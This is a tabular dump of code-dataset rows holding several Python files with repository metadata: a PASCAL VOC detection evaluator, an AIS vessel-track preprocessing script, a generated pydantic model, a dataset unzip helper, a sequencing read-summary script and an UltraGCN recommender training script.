hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ace93fc81fb4af2291927da36c6d64c315746def | 7,030 | py | Python | RFBNet-master/data/voc_eval.py | transcendentsky/detection_models | 185f4bcccd5ab2c2f8edac37c76a9ccc47f73883 | [
"Apache-2.0"
] | null | null | null | RFBNet-master/data/voc_eval.py | transcendentsky/detection_models | 185f4bcccd5ab2c2f8edac37c76a9ccc47f73883 | [
"Apache-2.0"
] | null | null | null | RFBNet-master/data/voc_eval.py | transcendentsky/detection_models | 185f4bcccd5ab2c2f8edac37c76a9ccc47f73883 | [
"Apache-2.0"
] | null | null | null | # --------------------------------------------------------
# Fast/er R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Bharath Hariharan
# --------------------------------------------------------
import xml.etree.ElementTree as ET
import os
import pickle
import numpy as np
import pdb
def parse_rec(filename):
""" Parse a PASCAL VOC xml file """
tree = ET.parse(filename)
objects = []
for obj in tree.findall('object'):
obj_struct = {}
obj_struct['name'] = obj.find('name').text
obj_struct['pose'] = obj.find('pose').text
obj_struct['truncated'] = int(obj.find('truncated').text)
obj_struct['difficult'] = int(obj.find('difficult').text)
bbox = obj.find('bndbox')
obj_struct['bbox'] = [int(bbox.find('xmin').text),
int(bbox.find('ymin').text),
int(bbox.find('xmax').text),
int(bbox.find('ymax').text)]
objects.append(obj_struct)
return objects
def voc_ap(rec, prec, use_07_metric=False):
""" ap = voc_ap(rec, prec, [use_07_metric])
Compute VOC AP given precision and recall.
If use_07_metric is true, uses the
VOC 07 11 point method (default:False).
"""
if use_07_metric:
# 11 point metric
ap = 0.
for t in np.arange(0., 1.1, 0.1):
if np.sum(rec >= t) == 0:
p = 0
else:
p = np.max(prec[rec >= t])
ap = ap + p / 11.
else:
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def voc_eval(detpath,
annopath,
imagesetfile,
classname,
cachedir,
ovthresh=0.5,
use_07_metric=False):
"""rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
[ovthresh],
[use_07_metric])
Top level function that does the PASCAL VOC evaluation.
detpath: Path to detections
detpath.format(classname) should produce the detection results file.
annopath: Path to annotations
annopath.format(imagename) should be the xml annotations file.
imagesetfile: Text file containing the list of images, one image per line.
classname: Category name (duh)
cachedir: Directory for caching the annotations
[ovthresh]: Overlap threshold (default = 0.5)
[use_07_metric]: Whether to use VOC07's 11 point AP computation
(default False)
"""
# assumes detections are in detpath.format(classname)
# assumes annotations are in annopath.format(imagename)
# assumes imagesetfile is a text file with each line an image name
# cachedir caches the annotations in a pickle file
# first load gt
if not os.path.isdir(cachedir):
os.mkdir(cachedir)
cachefile = os.path.join(cachedir, 'annots.pkl')
# read list of images
with open(imagesetfile, 'r') as f:
lines = f.readlines()
imagenames = [x.strip() for x in lines]
if not os.path.isfile(cachefile):
# load annots
recs = {}
for i, imagename in enumerate(imagenames):
recs[imagename] = parse_rec(annopath.format(imagename))
if i % 100 == 0:
print('Reading annotation for {:d}/{:d}'.format(
i + 1, len(imagenames)))
# save
print('Saving cached annotations to {:s}'.format(cachefile))
with open(cachefile, 'wb') as f:
pickle.dump(recs, f)
else:
# load
with open(cachefile, 'rb') as f:
recs = pickle.load(f)
# extract gt objects for this class
class_recs = {}
npos = 0
for imagename in imagenames:
R = [obj for obj in recs[imagename] if obj['name'] == classname]
bbox = np.array([x['bbox'] for x in R])
difficult = np.array([x['difficult'] for x in R]).astype(np.bool)
det = [False] * len(R)
npos = npos + sum(~difficult)
class_recs[imagename] = {'bbox': bbox,
'difficult': difficult,
'det': det}
# read dets
detfile = detpath.format(classname)
with open(detfile, 'r') as f:
lines = f.readlines()
splitlines = [x.strip().split(' ') for x in lines]
image_ids = [x[0] for x in splitlines]
confidence = np.array([float(x[1]) for x in splitlines])
BB = np.array([[float(z) for z in x[2:]] for x in splitlines])
# sort by confidence
sorted_ind = np.argsort(-confidence)
sorted_scores = np.sort(-confidence)
try:
BB = BB[sorted_ind, :]
except:
BB = BB[sorted_ind]
image_ids = [image_ids[x] for x in sorted_ind]
# go down dets and mark TPs and FPs
nd = len(image_ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for d in range(nd):
R = class_recs[image_ids[d]]
bb = BB[d, :].astype(float)
ovmax = -np.inf
BBGT = R['bbox'].astype(float)
if BBGT.size > 0:
# compute overlaps
# intersection
ixmin = np.maximum(BBGT[:, 0], bb[0])
iymin = np.maximum(BBGT[:, 1], bb[1])
ixmax = np.minimum(BBGT[:, 2], bb[2])
iymax = np.minimum(BBGT[:, 3], bb[3])
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
# union
uni = ((bb[2] - bb[0] + 1.) * (bb[3] - bb[1] + 1.) +
(BBGT[:, 2] - BBGT[:, 0] + 1.) *
(BBGT[:, 3] - BBGT[:, 1] + 1.) - inters)
overlaps = inters / uni
ovmax = np.max(overlaps)
jmax = np.argmax(overlaps)
if ovmax > ovthresh:
if not R['difficult'][jmax]:
if not R['det'][jmax]:
tp[d] = 1.
R['det'][jmax] = 1
else:
fp[d] = 1.
else:
fp[d] = 1.
# compute precision recall
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / float(npos)
# avoid divide by zero in case the first detection matches a difficult
# ground truth
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = voc_ap(rec, prec, use_07_metric)
return rec, prec, ap
| 33.798077 | 78 | 0.522475 |
ace93fdb028d16cec4b8dd5f65ba2e987098f35e | 12,436 | py | Python | data/csv2pkl.py | dnguyengithub/MultitaskAIS | b2862f27513f6f9de25d345451cfc00bb21cd9f3 | [
"MIT"
] | 62 | 2018-12-08T13:20:06.000Z | 2022-03-30T11:04:31.000Z | data/csv2pkl.py | dnguyengithub/MultitaskAIS | b2862f27513f6f9de25d345451cfc00bb21cd9f3 | [
"MIT"
] | 21 | 2019-03-07T11:24:54.000Z | 2020-12-24T04:05:08.000Z | data/csv2pkl.py | dnguyengithub/MultitaskAIS | b2862f27513f6f9de25d345451cfc00bb21cd9f3 | [
"MIT"
] | 35 | 2019-02-14T14:44:36.000Z | 2022-02-27T14:32:21.000Z | # coding: utf-8
# MIT License
#
# Copyright (c) 2018 Duong Nguyen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ==============================================================================
"""
A script to merge AIS messages into AIS tracks.
"""
import numpy as np
import matplotlib.pyplot as plt
import os
import sys
#sys.path.append("..")
#import utils
import pickle
import copy
import csv
from datetime import datetime
import time
from io import StringIO
from tqdm import tqdm as tqdm
## PARAMS
#======================================
## Bretagne dataset
# LAT_MIN = 46.5
# LAT_MAX = 50.5
# LON_MIN = -8.0
# LON_MAX = -3.0
# # Pkl filenames.
# pkl_filename = "bretagne_20170103_track.pkl"
# pkl_filename_train = "bretagne_20170103_10_20_train_track.pkl"
# pkl_filename_valid = "bretagne_20170103_10_20_valid_track.pkl"
# pkl_filename_test = "bretagne_20170103_10_20_test_track.pkl"
# # Path to csv files.
# dataset_path = "./"
# l_csv_filename =["positions_bretagne_jan_mar_2017.csv"]
# # Training/validation/test/total period.
# t_train_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
# t_train_max = time.mktime(time.strptime("10/03/2017 23:59:59", "%d/%m/%Y %H:%M:%S"))
# t_valid_min = time.mktime(time.strptime("11/03/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
# t_valid_max = time.mktime(time.strptime("20/03/2017 23:59:59", "%d/%m/%Y %H:%M:%S"))
# t_test_min = time.mktime(time.strptime("21/03/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
# t_test_max = time.mktime(time.strptime("31/03/2017 23:59:59", "%d/%m/%Y %H:%M:%S"))
# t_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
# t_max = time.mktime(time.strptime("31/03/2017 23:59:59", "%d/%m/%Y %H:%M:%S"))
# cargo_tanker_filename = "bretagne_20170103_cargo_tanker.npy"
# ## Aruba
LAT_MIN = 9.0
LAT_MAX = 14.0
LON_MIN = -71.0
LON_MAX = -66.0
D2C_MIN = 2000 #meters
# Path to csv files.
"""
dataset_path = "./"
l_csv_filename =["aruba_5x5deg_2017305_2018031.csv",
"aruba_5x5deg_2018305_2019031.csv",
"aruba_5x5deg_2019305_2020031.csv"]
l_csv_filename =["aruba_5x5deg_2017305_2018031.csv"]
pkl_filename = "aruba_20172020_track.pkl"
pkl_filename_train = "aruba_20172020_train_track.pkl"
pkl_filename_valid = "aruba_20172020_valid_track.pkl"
pkl_filename_test = "aruba_20172020_test_track.pkl"
cargo_tanker_filename = "aruba_20172020_cargo_tanker.npy"
t_train_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_train_max = time.mktime(time.strptime("31/01/2019 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_valid_min = time.mktime(time.strptime("01/11/2019 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_valid_max = time.mktime(time.strptime("31/12/2019 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_test_min = time.mktime(time.strptime("01/01/2020 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_test_max = time.mktime(time.strptime("31/01/2020 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_max = time.mktime(time.strptime("31/01/2020 23:59:59", "%d/%m/%Y %H:%M:%S"))
"""
dataset_path = "./"
l_csv_filename =["aruba_zone1_5x5deg_2017121_2017244.csv",
"aruba_5x5deg_2018121_2018244.csv",
"aruba_zone1_5x5deg_2019121_2019244.csv"]
#l_csv_filename =["aruba_5x5deg_2018121_2018244.csv"]
pkl_filename = "aruba_20172020_summer_track.pkl"
pkl_filename_train = "aruba_20172020_summer_train_track.pkl"
pkl_filename_valid = "aruba_20172020_summer_valid_track.pkl"
pkl_filename_test = "aruba_20172020_summer_test_track.pkl"
cargo_tanker_filename = "aruba_20172020_summer_cargo_tanker.npy"
t_train_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_train_max = time.mktime(time.strptime("31/08/2018 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_valid_min = time.mktime(time.strptime("01/05/2019 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_valid_max = time.mktime(time.strptime("31/07/2019 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_test_min = time.mktime(time.strptime("01/08/2019 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_test_max = time.mktime(time.strptime("31/08/2019 23:59:59", "%d/%m/%Y %H:%M:%S"))
t_min = time.mktime(time.strptime("01/01/2017 00:00:00", "%d/%m/%Y %H:%M:%S"))
t_max = time.mktime(time.strptime("31/01/2020 23:59:59", "%d/%m/%Y %H:%M:%S"))
#========================================================================
LAT_RANGE = LAT_MAX - LAT_MIN
LON_RANGE = LON_MAX - LON_MIN
SOG_MAX = 30.0 # the SOG is truncated to 30.0 knots max.
EPOCH = datetime(1970, 1, 1)
LAT, LON, SOG, COG, HEADING, ROT, NAV_STT, TIMESTAMP, MMSI, SHIPTYPE, D2C = list(range(11))
CARGO_TANKER_ONLY = True
if CARGO_TANKER_ONLY:
pkl_filename = "ct_"+pkl_filename
pkl_filename_train = "ct_"+pkl_filename_train
pkl_filename_valid = "ct_"+pkl_filename_valid
pkl_filename_test = "ct_"+pkl_filename_test
print(pkl_filename_train)
## LOADING CSV FILES
#======================================
l_l_msg = [] # list of AIS messages, each row is a message (list of AIS attributes)
n_error = 0
for csv_filename in l_csv_filename:
data_path = os.path.join(dataset_path,csv_filename)
with open(data_path,"r") as f:
print("Reading ", csv_filename, "...")
csvReader = csv.reader(f)
next(csvReader) # skip the legend row
count = 1
for row in csvReader:
# utc_time = datetime.strptime(row[8], "%Y/%m/%d %H:%M:%S")
# timestamp = (utc_time - EPOCH).total_seconds()
print(count)
count += 1
try:
l_l_msg.append([float(row[5]),float(row[6]),
float(row[7]),float(row[8]),
int(row[9]),float(row[12]),
int(row[11]),int(row[4]),
int(float(row[1])),
int(row[13]),
float(row[14])])
except:
n_error += 1
continue
m_msg = np.array(l_l_msg)
#del l_l_msg
print("Total number of AIS messages: ",m_msg.shape[0])
print("Lat min: ",np.min(m_msg[:,LAT]), "Lat max: ",np.max(m_msg[:,LAT]))
print("Lon min: ",np.min(m_msg[:,LON]), "Lon max: ",np.max(m_msg[:,LON]))
print("Ts min: ",np.min(m_msg[:,TIMESTAMP]), "Ts max: ",np.max(m_msg[:,TIMESTAMP]))
if m_msg[0,TIMESTAMP] > 1584720228:
m_msg[:,TIMESTAMP] = m_msg[:,TIMESTAMP]/1000 # Convert to suitable timestamp format
print("Time min: ",datetime.utcfromtimestamp(np.min(m_msg[:,TIMESTAMP])).strftime('%Y-%m-%d %H:%M:%SZ'))
print("Time max: ",datetime.utcfromtimestamp(np.max(m_msg[:,TIMESTAMP])).strftime('%Y-%m-%d %H:%M:%SZ'))
## Vessel Type
#======================================
print("Selecting vessel type ...")
def sublist(lst1, lst2):
ls1 = [element for element in lst1 if element in lst2]
ls2 = [element for element in lst2 if element in lst1]
return (len(ls1) != 0) and (ls1 == ls2)
VesselTypes = dict()
l_mmsi = []
n_error = 0
for v_msg in tqdm(m_msg):
try:
mmsi_ = v_msg[MMSI]
type_ = v_msg[SHIPTYPE]
if mmsi_ not in l_mmsi :
VesselTypes[mmsi_] = [type_]
l_mmsi.append(mmsi_)
elif type_ not in VesselTypes[mmsi_]:
VesselTypes[mmsi_].append(type_)
except:
n_error += 1
continue
print(n_error)
for mmsi_ in tqdm(list(VesselTypes.keys())):
VesselTypes[mmsi_] = np.sort(VesselTypes[mmsi_])
l_cargo_tanker = []
l_fishing = []
for mmsi_ in list(VesselTypes.keys()):
if sublist(VesselTypes[mmsi_], list(range(70,80))) or sublist(VesselTypes[mmsi_], list(range(80,90))):
l_cargo_tanker.append(mmsi_)
if sublist(VesselTypes[mmsi_], [30]):
l_fishing.append(mmsi_)
print("Total number of vessels: ",len(VesselTypes))
print("Total number of cargos/tankers: ",len(l_cargo_tanker))
print("Total number of fishing: ",len(l_fishing))
print("Saving vessels' type list to ", cargo_tanker_filename)
np.save(cargo_tanker_filename,l_cargo_tanker)
np.save(cargo_tanker_filename.replace("_cargo_tanker.npy","_fishing.npy"),l_fishing)
## FILTERING
#======================================
# Selecting AIS messages in the ROI and in the period of interest.
## LAT LON
m_msg = m_msg[m_msg[:,LAT]>=LAT_MIN]
m_msg = m_msg[m_msg[:,LAT]<=LAT_MAX]
m_msg = m_msg[m_msg[:,LON]>=LON_MIN]
m_msg = m_msg[m_msg[:,LON]<=LON_MAX]
# SOG
m_msg = m_msg[m_msg[:,SOG]>=0]
m_msg = m_msg[m_msg[:,SOG]<=SOG_MAX]
# COG
m_msg = m_msg[m_msg[:,SOG]>=0]
m_msg = m_msg[m_msg[:,COG]<=360]
# D2C
m_msg = m_msg[m_msg[:,D2C]>=D2C_MIN]
# TIME
m_msg = m_msg[m_msg[:,TIMESTAMP]>=0]
m_msg = m_msg[m_msg[:,TIMESTAMP]>=t_min]
m_msg = m_msg[m_msg[:,TIMESTAMP]<=t_max]
m_msg_train = m_msg[m_msg[:,TIMESTAMP]>=t_train_min]
m_msg_train = m_msg_train[m_msg_train[:,TIMESTAMP]<=t_train_max]
m_msg_valid = m_msg[m_msg[:,TIMESTAMP]>=t_valid_min]
m_msg_valid = m_msg_valid[m_msg_valid[:,TIMESTAMP]<=t_valid_max]
m_msg_test = m_msg[m_msg[:,TIMESTAMP]>=t_test_min]
m_msg_test = m_msg_test[m_msg_test[:,TIMESTAMP]<=t_test_max]
print("Total msgs: ",len(m_msg))
print("Number of msgs in the training set: ",len(m_msg_train))
print("Number of msgs in the validation set: ",len(m_msg_valid))
print("Number of msgs in the test set: ",len(m_msg_test))
## MERGING INTO DICT
#======================================
# Creating AIS tracks from the list of AIS messages.
# Each AIS track is formatted by a dictionary.
print("Convert to dicts of vessel's tracks...")
# Training set
Vs_train = dict()
for v_msg in tqdm(m_msg_train):
mmsi = int(v_msg[MMSI])
if not (mmsi in list(Vs_train.keys())):
Vs_train[mmsi] = np.empty((0,9))
Vs_train[mmsi] = np.concatenate((Vs_train[mmsi], np.expand_dims(v_msg[:9],0)), axis = 0)
for key in tqdm(list(Vs_train.keys())):
if CARGO_TANKER_ONLY and (not key in l_cargo_tanker):
del Vs_train[key]
else:
Vs_train[key] = np.array(sorted(Vs_train[key], key=lambda m_entry: m_entry[TIMESTAMP]))
# Validation set
Vs_valid = dict()
for v_msg in tqdm(m_msg_valid):
mmsi = int(v_msg[MMSI])
if not (mmsi in list(Vs_valid.keys())):
Vs_valid[mmsi] = np.empty((0,9))
Vs_valid[mmsi] = np.concatenate((Vs_valid[mmsi], np.expand_dims(v_msg[:9],0)), axis = 0)
for key in tqdm(list(Vs_valid.keys())):
if CARGO_TANKER_ONLY and (not key in l_cargo_tanker):
del Vs_valid[key]
else:
Vs_valid[key] = np.array(sorted(Vs_valid[key], key=lambda m_entry: m_entry[TIMESTAMP]))
# Test set
Vs_test = dict()
for v_msg in tqdm(m_msg_test):
mmsi = int(v_msg[MMSI])
if not (mmsi in list(Vs_test.keys())):
Vs_test[mmsi] = np.empty((0,9))
Vs_test[mmsi] = np.concatenate((Vs_test[mmsi], np.expand_dims(v_msg[:9],0)), axis = 0)
for key in tqdm(list(Vs_test.keys())):
if CARGO_TANKER_ONLY and (not key in l_cargo_tanker):
del Vs_test[key]
else:
Vs_test[key] = np.array(sorted(Vs_test[key], key=lambda m_entry: m_entry[TIMESTAMP]))
## PICKLING
#======================================
for filename, filedict in zip([pkl_filename_train,pkl_filename_valid,pkl_filename_test],
[Vs_train,Vs_valid,Vs_test]
):
print("Writing to ", os.path.join(dataset_path,filename),"...")
with open(os.path.join(dataset_path,filename),"wb") as f:
pickle.dump(filedict,f)
print("Total number of tracks: ", len(filedict))
| 37.914634 | 106 | 0.649807 |
ace940f0f27ff84f6810829e55e1e86c12ac4b3e | 298 | py | Python | tests/data/expected/main/main_jsonschema_ids/type.py | adaamz/datamodel-code-generator | 3b34573f35f8d420e4668a85047c757fd1da7754 | [
"MIT"
] | 891 | 2019-07-23T04:23:32.000Z | 2022-03-31T13:36:33.000Z | tests/data/expected/main/main_jsonschema_ids/type.py | adaamz/datamodel-code-generator | 3b34573f35f8d420e4668a85047c757fd1da7754 | [
"MIT"
] | 663 | 2019-07-23T09:50:26.000Z | 2022-03-29T01:56:55.000Z | tests/data/expected/main/main_jsonschema_ids/type.py | adaamz/datamodel-code-generator | 3b34573f35f8d420e4668a85047c757fd1da7754 | [
"MIT"
] | 108 | 2019-07-23T08:50:37.000Z | 2022-03-09T10:50:22.000Z | # generated by datamodel-codegen:
# filename: Organization.schema.json
# timestamp: 1985-10-26T08:21:00+00:00
from __future__ import annotations
from pydantic import BaseModel, Field
class Schema(BaseModel):
__root__: str = Field(..., description='Type of this object.', title='type')
| 24.833333 | 80 | 0.738255 |
ace94138d76eba5e725120f61f43971c819f0faf | 640 | py | Python | data/PROMISE12/setup.py | elias-1/NiftyNet | 05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2 | [
"Apache-2.0"
] | 1,403 | 2017-08-30T11:49:45.000Z | 2022-03-31T11:44:05.000Z | data/PROMISE12/setup.py | elias-1/NiftyNet | 05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2 | [
"Apache-2.0"
] | 360 | 2017-10-03T15:33:53.000Z | 2021-03-17T06:27:38.000Z | data/PROMISE12/setup.py | elias-1/NiftyNet | 05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2 | [
"Apache-2.0"
] | 464 | 2017-09-13T20:56:32.000Z | 2022-02-11T20:33:47.000Z | """
Unzip data downloaded from challenge website:
https://promise12.grand-challenge.org/
The outcome should be three folders named:
TrainingData_Part1, TrainingData_Part2, TrainingData_Part3
each folder contains multiple '.mhd' and '.raw' files
"""
import os
import zipfile
zip_dir = '.'
target_dir = '.'
for zip_filename in {'TrainingData_Part1.zip', 'TrainingData_Part2.zip',
'TrainingData_Part3.zip'}:
print('Extracting', zip_filename, '...')
zip_ref = zipfile.ZipFile(os.path.join(zip_dir, zip_filename), 'r')
zip_ref.extractall(os.path.basename(zip_filename.replace('.zip', '')))
zip_ref.close()
| 32 | 74 | 0.71875 |
ace941a97108bbf77b0a8960eba5bf85c89bdbce | 3,069 | py | Python | mgatk/bin/python/sumstatsBPtenx.py | bobermayer/mgatk | 735cc217f5409519b22eae8b79c887eca11bf12d | [
"MIT"
] | 55 | 2020-01-21T15:47:26.000Z | 2022-03-08T06:53:22.000Z | mgatk/bin/python/sumstatsBPtenx.py | bobermayer/mgatk | 735cc217f5409519b22eae8b79c887eca11bf12d | [
"MIT"
] | 37 | 2020-06-12T08:58:41.000Z | 2022-03-11T19:49:44.000Z | mgatk/bin/python/sumstatsBPtenx.py | bobermayer/mgatk | 735cc217f5409519b22eae8b79c887eca11bf12d | [
"MIT"
] | 10 | 2020-08-24T16:23:00.000Z | 2021-12-17T21:54:34.000Z | #!/usr/bin/python
###################################################
# Summarizes the total number of reads per position / strand
###################################################
import sys
import re
import os
import pysam
import numpy as np
bam_file = sys.argv[1]
barcodes_file = sys.argv[2]
out_pre = sys.argv[3]
max_bp = int(sys.argv[4])
base_qual = float(sys.argv[5])
fasta_file = sys.argv[6]
alignment_quality = float(sys.argv[7])
barcode_tag = sys.argv[8]
# Import barcodes
with open(barcodes_file) as barcode_file_handle:
content = barcode_file_handle.readlines()
bcs = [x.strip() for x in content]
bam_input = pysam.AlignmentFile(bam_file, "rb")
dna_letters = ['A','C','G','T']
def getBarcode(intags):
'''
Parse out the barcode per-read
'''
for tg in intags:
if(barcode_tag == tg[0]):
return(tg[1])
return("NA")
# Dimension cell x position x letter x strand
# Coverage associated with the bases
ca = np.zeros((len(bcs),max_bp,4,2), dtype=int)
for read in bam_input:
if(read.is_reverse):
s_idx = 1
else:
s_idx = 0
# Get read attributes
seq = read.seq
quality = read.query_qualities
align_qual_read = read.mapping_quality
cell_barcode = getBarcode(read.tags)
if(cell_barcode != "NA"):
c_idx = bcs.index(cell_barcode)
for q_idx, p_idx in read.get_aligned_pairs(True):
if q_idx is not None and p_idx is not None and align_qual_read > alignment_quality:
if(quality[q_idx] > base_qual and seq[q_idx] in dna_letters):
l_idx = dna_letters.index(seq[q_idx])
ca[c_idx,p_idx,l_idx,s_idx] += 1
# Function to write the slice of the matrix that is associated with the
def writeSparseMatrixLetter(letter, letter_idx):
out_file_fn = out_pre + "."+letter+".txt"
with open(out_file_fn,"w") as file_handle_fn:
for cell_idx, cell_name in enumerate(bcs):
# Pull out the stranded counts
fw_vec = ca[cell_idx,:,letter_idx,0].ravel()
rev_vec = ca[cell_idx,:,letter_idx,1].ravel()
# Write each position
for i in range(0,int(max_bp)):
if(fw_vec[i] > 0 or rev_vec[i] > 0):
file_handle_fn.write(str(i+1)+","+cell_name+","+str(fw_vec[i])+","+str(rev_vec[i])+"\n")
writeSparseMatrixLetter("A", 0)
writeSparseMatrixLetter("C", 1)
writeSparseMatrixLetter("G", 2)
writeSparseMatrixLetter("T", 3)
# Export the per-base coverage for the thrill of it and the depth
out_file_depth = out_pre.replace("/temp/sparse_matrices/", "/qc/depth/") + ".depth.txt"
out_file_coverage= out_pre + ".coverage.txt"
with open(out_file_coverage,"w") as file_handle_cov:
with open(out_file_depth,"w") as file_handle_depth:
# Loop over cells
for cell_idx, cell_name in enumerate(bcs):
# Pull out the summed counts per cell per position
cov_vec = np.sum(ca[cell_idx,:,:,:], axis = (1,2)).tolist()
depth = round(sum(cov_vec)/len(cov_vec),2)
# Write each position
for i in range(0,int(max_bp)):
if(cov_vec[i] > 0):
file_handle_cov.write(str(i+1)+","+cell_name+","+str(cov_vec[i])+"\n")
# Now write the depth
file_handle_depth.write(cell_name+"\t"+str(depth)+"\n")
| 28.416667 | 93 | 0.675138 |
ace941ae0aafe259aa90de5508dd482b34d182a8 | 3,127 | py | Python | examples/train_ultragcn.py | TedSIWEILIU/beta-recsys | e2289fca42151b6027a309537a58816ff24184c4 | [
"MIT"
] | null | null | null | examples/train_ultragcn.py | TedSIWEILIU/beta-recsys | e2289fca42151b6027a309537a58816ff24184c4 | [
"MIT"
] | null | null | null | examples/train_ultragcn.py | TedSIWEILIU/beta-recsys | e2289fca42151b6027a309537a58816ff24184c4 | [
"MIT"
] | null | null | null | """isort:skip_file."""
import argparse
import os
import sys
sys.path.append("../")
from beta_rec.core.train_engine import TrainEngine
from beta_rec.models.ultragcn import UltraGCNEngine
from beta_rec.utils.monitor import Monitor
def parse_args():
"""Parse args from command line.
Returns:
args object.
"""
parser = argparse.ArgumentParser(description="Run UltraGCN..")
parser.add_argument(
"--config_file",
nargs="?",
type=str,
default="../configs/ultragcn_default.json",
help="Specify the config file name. Only accept a file from ../configs/",
)
# If the following settings are specified with command line,
# These settings will used to update the parameters received from the config file.
parser.add_argument(
"--emb_dim", nargs="?", type=int, help="Dimension of the embedding."
)
parser.add_argument(
"--tune", nargs="?", type=str, default=False, help="Tun parameter",
)
parser.add_argument("--lr", nargs="?", type=float, help="Initialize learning rate.")
parser.add_argument("--max_epoch", nargs="?", type=int, help="Number of max epoch.")
parser.add_argument(
"--batch_size", nargs="?", type=int, help="Batch size for training."
)
return parser.parse_args()
class UltraGCN_train(TrainEngine):
"""An instance class from the TrainEngine base class."""
def __init__(self, config):
"""Initialize UltraGCN_train Class.
Args:
config (dict): All the parameters for the model.
"""
self.config = config
super(UltraGCN_train, self).__init__(config)
self.load_dataset()
self.build_data_loader()
self.engine = UltraGCNEngine(self.config)
def build_data_loader(self):
"""Load all matrix."""
train_mat, constraint_mat = self.data.get_constraint_mat(self.config)
# norm_adj = sparse_mx_to_torch_sparse_tensor(norm_adj_mat)
self.config["model"]["train_mat"] = train_mat
self.config["model"]["constraint_mat"] = constraint_mat
self.config["model"]["n_users"] = self.data.n_users
self.config["model"]["n_items"] = self.data.n_items
def train(self):
"""Train the model."""
self.monitor = Monitor(
log_dir=self.config["system"]["run_dir"], delay=1, gpu_id=self.gpu_id
)
self.model_save_dir = os.path.join(
self.config["system"]["model_save_dir"], self.config["model"]["save_name"]
)
train_loader = self.data.instance_mul_neg_loader(
batch_size=self.config["model"]["batch_size"],
device=self.config["model"]["device_str"],
num_negative=self.config["model"]["negative_num"],
)
self._train(self.engine, train_loader, self.model_save_dir)
self.config["run_time"] = self.monitor.stop()
return self.eval_engine.best_valid_performance
if __name__ == "__main__":
args = parse_args()
print(args.config_file)
train_engine = UltraGCN_train(args)
train_engine.train()
train_engine.test()
| 33.265957 | 88 | 0.645027 |
ace941c927fbc0d8a5c30ab8100da0b3a0529514 | 219 | py | Python | example/exampleapp/urls.py | The-Politico/politico-civic-election-night | a8aaf5be43872a7b84d2b0d7c2b6151d32d4d8b6 | [
"MIT"
